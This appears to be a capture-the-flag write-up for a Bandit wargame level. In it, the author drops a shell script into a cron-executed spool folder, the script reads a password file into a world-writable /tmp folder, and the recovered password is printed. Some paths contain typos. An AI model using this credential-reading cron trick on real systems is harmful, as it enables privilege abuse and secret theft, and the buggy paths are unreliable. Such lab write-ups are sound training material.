A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
Doing the same thing from last level, we found the following script
cat cronjob_bandit24 * * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null cat /usr/bin/cronjob_bandit24.sh #!/bin/bash myname=$(whoami) cd /var/spool/$myname echo "Executing and deleting all scripts in /var/spool/$myname:" for i in *; do echo "Handling $i" ./$i rm -f $i done
From the description of the script, it will execute all the script inside the $myname folder. We found that there is a bandit24 folder in /var/spool/. Therefore, let’s get a simple script of copying the password to a tmp folder (like two levels before)
mkdir /tmp/b23abc vim /tmp/b23abc/getpass.sh cat /tmp/b23abc/getpass.sh #!/bin/bash cat /etc/bandit_pass/bandit24 > tmp/b23abc/pass.txt
At this point, I can copy the file to /var/spool/bandit24/ but I remember the permission for execute must be set.
chmod 777 /tmp/b23abc/getpass.sh cp /tmp/b23abc/getpass.sh /var/spool/bandit24/
However, after couple minutes, I did not get a pass.txt appear in the folder. What I forgot is to set the permission of the folder that the pass.txt is writing into. Wait for a minute and find the file and the content of the next password.
chmod 777 /tmp/b23ac/ cat /tmp/b23abc/pass.txt UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ